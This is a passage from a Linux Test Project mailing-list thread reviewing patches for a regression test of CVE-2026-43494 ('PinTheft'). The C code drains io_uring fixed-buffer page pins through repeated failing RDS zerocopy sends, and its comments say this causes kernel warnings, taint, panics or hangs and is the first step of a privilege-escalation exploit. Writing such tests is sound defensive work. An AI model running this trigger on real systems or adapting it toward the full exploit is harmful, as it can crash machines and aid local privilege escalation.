> + struct io_uring_clone_buffers clone;
> +
> + memset(&clone, 0, sizeof(clone));
> + clone.src_fd = src_fd;
> +
> + return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
> + &clone, 1);
> +}
> +
> +static void setup(void)
> +{
> + struct io_uring_params params = {};
> + struct iovec fixed_iov;
> + int val;
> +
> + page_size = SAFE_SYSCONF(_SC_PAGESIZE);
> + io_uring_setup_supported_by_kernel();
> +
> + /*
> + * The exploit primitive keeps one fixed-buffer registration alive and
> + * clones it to another ring.
> + */
> + ring_fd1 = io_uring_setup(1, &params);
> + if (ring_fd1 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
> +
> + memset(&params, 0, sizeof(params));
> +
> + ring_fd2 = io_uring_setup(1, &params);
> + if (ring_fd2 < 0)
> + tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
> +
> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> + if (rds_fd < 0) {
> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> + tst_brk(TCONF | TERRNO, "RDS is not available");
EAFNOSUPPORT should be a sufficient availability check.
> +
> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
> + }
> +
> + /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
> + val = RDS_TRANS_TCP;
> + TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
> +
> + if (TST_RET) {
> + if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
> + tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
> +
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
> + }
> +
> + /*
> + * Allocate two adjacent pages: the first one will be pinned as an
> + * io_uring fixed buffer, and the second one will be made inaccessible.
> + */
> + mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
> + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
> + memset(mapped_pages, 0xa5, page_size);
> +
> + /*
> + * RDS should successfully pin the first page, then fault on the second.
> + * That fault drives the buggy zerocopy error cleanup path.
> + */
> + SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
> +
> + fixed_iov.iov_base = mapped_pages;
> + fixed_iov.iov_len = page_size;
> +
> + /*
> + * Register only the first page as an io_uring fixed buffer. This creates
> + * the long-term page pin whose reference accounting the RDS bug damages.
> + */
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
> +
> + buffer_registered = 1;
> +
> + /*
> + * Clone the fixed buffer registration into the second ring, matching the
> + * public reproducer's lifetime pattern without performing the later
> + * page-cache overwrite stage.
> + */
> + if (clone_buffers(ring_fd2, ring_fd1)) {
> + if (errno == EINVAL || errno == EOPNOTSUPP)
> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> +
> + tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
> + }
> +
> + buffer_cloned = 1;
> +}
> +
> +static void trigger(void)
> +{
> + /*
> + * Derive RDS ports from the process ID so concurrent test instances
> + * do not collide in the RDS port namespace.
> + */
> + const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
> + struct sockaddr_in bind_addr = {
> + .sin_family = AF_INET,
> + .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
> + .sin_port = htons(src_port),
> + };
> + struct sockaddr_in dst_addr = {
> + .sin_family = AF_INET,
> + .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
> + .sin_port = htons(src_port + 1),
> + };
> + char control[CMSG_SPACE(sizeof(uint32_t))];
> + struct cmsghdr *cmsg;
> + struct iovec iov = {
> + .iov_base = mapped_pages,
> + .iov_len = 2 * page_size,
> + };
> + struct msghdr msg = {
> + .msg_name = &dst_addr,
> + .msg_namelen = sizeof(dst_addr),
> + .msg_iov = &iov,
> + .msg_iovlen = 1,
> + .msg_control = control,
> + .msg_controllen = sizeof(control),
> + };
> + int ret;
> + int val;
> + int i, efaults, first_bad_errno = 0;
> +
> + /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
> + val = 1;
> + if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
> + if (errno == ENOPROTOOPT || errno == EINVAL)
> + tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
> + tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
> + }
> +
> + val = 2 * page_size * 4;
> + SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
> +
> + /*
> + * Bind to one loopback RDS port and send to another unbound local port.
> + * The sends are expected to fail before any useful delivery; the faulting
> + * iovec is the interesting part.
> + */
> + SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
I'm not sure if RDS bind() works the same as other protocols but you
should be able to bind to port 0 (autoassign) and then read src_port
using TST_GETSOCKPORT(rds_fd).
> +
> + memset(control, 0, sizeof(control));
> + cmsg = (struct cmsghdr *)control;
> + cmsg->cmsg_level = SOL_RDS;
> + cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
> + cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
> +
> + /*
> + * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
> + * and page 1 is PROT_NONE. Each attempt should:
> + * 1. Pin page 0 successfully.
> + * 2. Fault on page 1, so RDS error path drops page 0's reference.
> + * 3. RDS message cleanup drops page 0's reference again (the bug).
> + *
> + * On a vulnerable kernel this steals one FOLL_PIN reference per
> + * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
> + * Unregistering the io_uring fixed buffer then tries to unpin a page
> + * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
> + * and taint.
> + *
> + * EFAULT is the expected error because page 1 is PROT_NONE. Other
> + * errors do not count as successful pin-theft iterations.
> + *
> + * Vulnerable kernels may crash, taint, panic, or hang here or during
> + * cleanup() below.
> + */
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
> + /* rds_cmsg_zcopy() in net/rds/send.c */
> + *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
> +
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
> + else if (!first_bad_errno)
> + first_bad_errno = errno;
> + }
> +
> + if (first_bad_errno) {
> + tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
> + first_bad_errno, tst_strerrno(first_bad_errno));
> + }
> +
> + tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + if (efaults == 0)
> + tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
> +
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + /*
> + * Unregistering fixed buffers on a vulnerable kernel triggers a
> + * double-unpin: io_uring tries to release references that the RDS bug
> + * already dropped, which may produce a kernel WARN or BUG_ON and taint.
> + */
> + cleanup();
You should not call cleanup() directly. You'll destroy resources
allocated in setup() and the test will then fail on fixed kernels if
you run it with -i 2.
> +}
> +
> +static void poke_rss_accounting(void)
> +{
> + char *mem;
> +
> + mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
> + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
> + memset(mem, 0x5a, RSS_CHECK_SIZE);
> + SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
> +}
> +
> +static void run(void)
> +{
> + pid_t pid;
> + int status;
> + int i;
> +
> + /*
> + * Run the dangerous part in a child so that process teardown can expose
> + * delayed RSS/page-accounting damage before the parent reports TPASS.
> + */
> + pid = SAFE_FORK();
> + if (!pid) {
> + trigger();
> + exit(0);
> + }
> +
> + SAFE_WAITPID(pid, &status, 0);
> + if (!WIFEXITED(status) || WEXITSTATUS(status))
> + return;
You can do tst_reap_children() instead. There's no need to exit early if
any child fails.
> +
> + /*
> + * The visible failure can be delayed until another mm is torn down.
> + * Create short-lived children that dirty and release anonymous memory to
> + * encourage RSS accounting checks before the parent reports success.
> + */
> + for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
> + pid = SAFE_FORK();
> + if (!pid) {
> + poke_rss_accounting();
> + exit(0);
> + }
> +
> + SAFE_WAITPID(pid, &status, 0);
Why not only fork() in the loop, let all children run in parallel, and
then reap + check taint after the loop?
> +
> + if (tst_taint_check()) {
> + tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
> + return;
> + }
> +
> + if (!WIFEXITED(status) || WEXITSTATUS(status))
> + return;
> + }
> +
> + /*
> + * RDS/page cleanup can run asynchronously after userspace returns from
> + * sendmsg() and after file descriptors are closed. Wait before declaring
> + * that the kernel merely "seems" to have survived.
> + */
> + for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
> + sleep(1);
> +
> + if (tst_taint_check()) {
> + tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
> + return;
> + }
> + }
> +
> + tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
> +}
> +
> +static void cleanup(void)
> +{
> + /*
> + * Unregister the clone first, then the source registration.
> + * Order matters: on a vulnerable kernel, unregistering ring_fd1
> + * (the original) after the FOLL_PIN references have been drained
> + * is what triggers the double-unpin WARN/BUG_ON.
> + */
> + if (buffer_cloned) {
> + io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
> + buffer_cloned = 0;
> + }
> +
> + if (buffer_registered) {
> + io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
> + buffer_registered = 0;
> + }
I think you could make the unregister calls together with closing the
relevant ring_fd. You don't need to keep special flags for what was registered.
> +
> + if (ring_fd2 >= 0) {
> + SAFE_CLOSE(ring_fd2);
> + ring_fd2 = -1;
SAFE_CLOSE() sets the file descriptor to -1 automatically. Ignore any AI
comments to the contrary.
> + }
> +
> + if (ring_fd1 >= 0) {
> + SAFE_CLOSE(ring_fd1);
> + ring_fd1 = -1;
> + }
> +
> + if (rds_fd >= 0) {
> + SAFE_CLOSE(rds_fd);
> + rds_fd = -1;
> + }
> +
> + if (mapped_pages) {
> + SAFE_MUNMAP(mapped_pages, 2 * page_size);
> + mapped_pages = NULL;
> + }
> +}
> +
> +static struct tst_test test = {
> + .test_all = run,
> + .setup = setup,
> + .cleanup = cleanup,
> + .timeout = 60,
> + .forks_child = 1,
> + .taint_check = TST_TAINT_W | TST_TAINT_D,
> + .needs_kconfigs = (const char *[]) {
> + "CONFIG_RDS",
> + "CONFIG_RDS_TCP",
> + "CONFIG_IO_URING",
> + NULL
> + },
> + .save_restore = (const struct tst_path_val[]) {
> + {"/proc/sys/kernel/io_uring_disabled", "0",
> + TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
> + {}
> + },
> + .tags = (const struct tst_tag[]) {
> + {"linux-git", "e17492979319"},
> + {"CVE", "2026-43494"},
> + {}
> + }
> +};
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
@ 2026-05-28 16:45 ` Martin Doucha
2026-05-28 21:31 ` Petr Vorel
0 siblings, 1 reply; 19+ messages in thread
From: Martin Doucha @ 2026-05-28 16:45 UTC (permalink / raw)
To: Petr Vorel, Sebastian Chlad; +Cc: Sebastian Chlad, ltp
Hi!
On 5/24/26 20:16, Petr Vorel wrote:
>> + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
>> + if (rds_fd < 0) {
>> + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
>> + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
>> + tst_brk(TCONF | TERRNO, "RDS is not available");
>> +
>> + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
>
> Just a quick Sunday evening comment (not yet looking into the reproducer itself).
> I wonder if we need this complicated check when we already have kconfig based
> checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
> encountered problems with older kernels?
I've checked, SAFE_SOCKET() will fail on kernel-default-base due to the
usual kconfig-RPM mismatch.
>> + if (clone_buffers(ring_fd2, ring_fd1)) {
>> + if (errno == EINVAL || errno == EOPNOTSUPP)
>> + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> Also here do we need it? IMHO CONFIG_IO_URING should be enough.
> And if errno is really needed, it'd IMHO be better to be in handled in
> clone_buffers(), not separately.
IORING_REGISTER_CLONE_BUFFERS was added in kernel v6.12 so the feature
check is also needed.
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-28 16:45 ` Martin Doucha
@ 2026-05-28 21:31 ` Petr Vorel
0 siblings, 0 replies; 19+ messages in thread
From: Petr Vorel @ 2026-05-28 21:31 UTC (permalink / raw)
To: Martin Doucha; +Cc: ltp, Sebastian Chlad
Hi Martin,
> Hi!
> On 5/24/26 20:16, Petr Vorel wrote:
> > > + rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> > > + if (rds_fd < 0) {
> > > + if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
> > > + errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
> > > + tst_brk(TCONF | TERRNO, "RDS is not available");
> > > +
> > > + tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
> > Just a quick Sunday evening comment (not yet looking into the reproducer itself).
> > I wonder if we need this complicated check when we already have kconfig based
> > checks at the end. Could we just simply use SAFE_SOCKET() here? Or have you
> > encountered problems with older kernels?
> I've checked, SAFE_SOCKET() will fail on kernel-default-base due to the
> usual kconfig-RPM mismatch.
Thanks for info! There will be more modules like this [*]. I also wonder if
SAFE_SOCKET() should not change to TCONF on these errnos, we do that already for
some safe functions (safe_io_uring_init(), safe_unshare(), safe_timerfd_*()). It
should be safe also in this case.
BTW isn't it that autoloading is not working? i.e. testing on some old machine
with Debian (i.e. not JeOS missing modules problem).
$ uname -r
6.18-amd64
# ./pintheft
...
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
=> module not autoloaded by socket() (or the other syscalls) => IMHO worth to
double check if it should be autoloaded and/or call "modprobe rds_tcp" in the test.
# modprobe rds
# ./pintheft
pintheft.c:337: TFAIL: Kernel is vulnerable: tainted during RSS accounting checks
tst_test.c:1928: TFAIL: Kernel is now tainted
=> loading manually it detects it
# rmmod rds_tcp
# rmmod rds
# ./pintheft
tst_kconfig.c:90: TINFO: Parsing kernel config '/boot/config-6.18-amd64'
tst_taint.c:85: TCONF: Ignoring already set kernel warning taint
...
pintheft.c:274: TINFO: Completed 1024/1024 sendmsg() attempts with EFAULT
pintheft.c:359: TPASS: Kernel seems to have survived RDS zerocopy cleanup
=> are we really safe now? Maybe yes, as rds is not autoloaded automatically.
> > > + if (clone_buffers(ring_fd2, ring_fd1)) {
> > > + if (errno == EINVAL || errno == EOPNOTSUPP)
> > > + tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
> > Also here do we need it? IMHO CONFIG_IO_URING should be enough.
> > And if errno is really needed, it'd IMHO be better to be in handled in
> > clone_buffers(), not separately.
> IORING_REGISTER_CLONE_BUFFERS was added in kernel v6.12 so the feature check
> is also needed.
Shouldn't the test require v6.12 then? Without it the test TCONFs anyway. Or do
you expect it to be backported? OTOH the fix was backported to v6.6.141 (but IMHO
the test is not able to test a kernel that old).
$ uname -r
6.9.9-amd64
# ./pintheft
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
# modprobe rds
# ./pintheft
pintheft.c:169: TCONF: IORING_REGISTER_CLONE_BUFFERS is not supported: EINVAL (22)
$ uname -r
6.12.38+deb13-amd64
# ./pintheft
pintheft.c:120: TCONF: RDS is not available: EAFNOSUPPORT (97)
# modprobe rds
# ./pintheft
pintheft.c:337: TFAIL: Kernel is vulnerable: tainted during RSS accounting checks
tst_test.c:1928: TFAIL: Kernel is now tainted
# rmmod rds_tcp
# modprobe rds
# modprobe rds_tcp
tst_taint.c:85: TCONF: Ignoring already set kernel warning taint
pintheft.c:359: TPASS: Kernel seems to have survived RDS zerocopy cleanup
Kind regards,
Petr
[*] I.e. any module which cannot be detected via /proc/sys like check in
lib/tst_kconfig_checks.h; I was even thinking about checking via /proc/modules
or /sys/module/*/, but that would work only to double check if module
autoloading or direct loading with modprobe work. Maybe too complicated, but for
tests which call modprobe on some modules e.g. hwpoison_inject or zram it could
be useful.
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-25 9:36 ` Cyril Hrubis
@ 2026-05-29 10:18 ` Andrea Cervesato via ltp
2026-05-29 11:56 ` Cyril Hrubis
0 siblings, 1 reply; 19+ messages in thread
From: Andrea Cervesato via ltp @ 2026-05-29 10:18 UTC (permalink / raw)
To: Cyril Hrubis; +Cc: ltp, linuxtestproject.agent
Hi Cyril,
> This one is actually wrong. For historical reasons macros are indented
> with spaces after the hash.
You should add a rule because we are actually asking to respect kernel
styling and probably that's the reason why this is spotted by LLM.
regards,
--
Andrea Cervesato
SUSE QE Automation Engineer Linux
andrea.cervesato@suse.com
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-29 10:18 ` Andrea Cervesato via ltp
@ 2026-05-29 11:56 ` Cyril Hrubis
0 siblings, 0 replies; 19+ messages in thread
From: Cyril Hrubis @ 2026-05-29 11:56 UTC (permalink / raw)
To: Andrea Cervesato; +Cc: ltp, linuxtestproject.agent
Hi!
> > This one is actually wrong. For historical reasons macros are indented
> > with spaces after the hash.
>
> You should add a rule because we are actually asking to respect kernel
> styling and probably that's the reason why this is spotted by LLM.
AFAIK kernel follows the same style here but I do not see it mentioned
anywhere in kernel documentation. It's probably one of the rules everyone
follows without thinking about it.
I will add a pull for the ltp-agent.
--
Cyril Hrubis
chrubis@suse.cz
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
2026-05-28 16:36 ` Martin Doucha
@ 2026-06-04 16:38 ` Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
0 siblings, 2 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-06-04 16:38 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Add IORING_REGISTER_CLONE_BUFFERS opcode and struct io_uring_clone_buffers
to lapi/io_uring.h for kernels/headers that predate the clone-buffers API.
Add lapi/rds.h with a fallback for RDS_CMSG_ZCOPY_COOKIE, which is absent
in older userspace headers (e.g. openSUSE Leap 42.2).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
configure.ac | 1 +
include/lapi/io_uring.h | 17 +++++++++++++++++
include/lapi/rds.h | 16 ++++++++++++++++
3 files changed, 34 insertions(+)
create mode 100644 include/lapi/rds.h
diff --git a/configure.ac b/configure.ac
index 0653d7793..3a1283ac3 100644
--- a/configure.ac
+++ b/configure.ac
@@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
+AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
AC_CHECK_TYPES([struct mount_attr],,,[
#ifdef HAVE_MOUNT_SETATTR
# include <sys/mount.h>
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..afc32c247 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,23 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+# define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS (linux/io_uring.h) */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
+struct io_uring_clone_buffers {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t src_off;
+ uint32_t dst_off;
+ uint32_t nr;
+ uint32_t pad[3];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/include/lapi/rds.h b/include/lapi/rds.h
new file mode 100644
index 000000000..7405a7f37
--- /dev/null
+++ b/include/lapi/rds.h
@@ -0,0 +1,16 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+#ifndef LAPI_RDS_H__
+#define LAPI_RDS_H__
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+# define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#endif /* LAPI_RDS_H__ */
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
@ 2026-06-04 16:38 ` Sebastian Chlad
2026-06-05 15:30 ` Martin Doucha
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
1 sibling, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-06-04 16:38 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v5:
Changes from the review applied.
Notably:
- Split LAPI changes into a separate commit
- Rename pintheft.c to io_uring04.c
- Remove redundant headers already included by tst_test.h
- Move RDS_CMSG_ZCOPY_COOKIE fallback to new lapi/rds.h
- Reduce CLEANUP_WAIT_SECS from 30 to 10
- Use EAFNOSUPPORT as the sole RDS availability check
- Use port 0 + TST_GETSOCKPORT() instead of PID-derived port
- Don't call cleanup() from trigger(); move buffer unregistration to run()
- Use tst_reap_children() instead of SAFE_WAITPID and status check
- Fork all RSS children in parallel, check taint once after tst_reap_children()
- Remove buffer_registered/buffer_cloned flags; pair unregister with SAFE_CLOSE
- Remove manual fd = -1 after SAFE_CLOSE
runtest/cve | 1 +
runtest/syscalls | 1 +
.../kernel/syscalls/io_uring/io_uring04.c | 358 ++++++++++++++++++
3 files changed, 360 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/io_uring04.c
diff --git a/runtest/cve b/runtest/cve
index a5952b56c..cc664bb93 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,5 +95,6 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 io_uring04
cve-2026-46300 xfrm02
cve-2026-46300-skb-segment xfrm03
diff --git a/runtest/syscalls b/runtest/syscalls
index f790e8f84..6b047b5fd 100644
--- a/runtest/syscalls
+++ b/runtest/syscalls
@@ -1904,6 +1904,7 @@ membarrier01 membarrier01
io_uring01 io_uring01
io_uring02 io_uring02
io_uring03 io_uring03
+io_uring04 io_uring04
# Tests below may cause kernel memory leak
perf_event_open03 perf_event_open03
diff --git a/testcases/kernel/syscalls/io_uring/io_uring04.c b/testcases/kernel/syscalls/io_uring/io_uring04.c
new file mode 100644
index 000000000..040f1bdf5
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/io_uring04.c
@@ -0,0 +1,358 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <stdint.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/rds.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 10
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/* Matches mm/gup.c: FOLL_PIN adds this bias to the page refcount. */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static long page_size;
+static void *mapped_pages;
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring. The child runs the FOLL_PIN drain loop;
+ * run() unregisters the buffers afterwards to trigger the double-unpin
+ * WARN/BUG_ON on vulnerable kernels.
+ */
+ ring_fd1 = io_uring_setup(1, &params);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(&params, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, &params);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
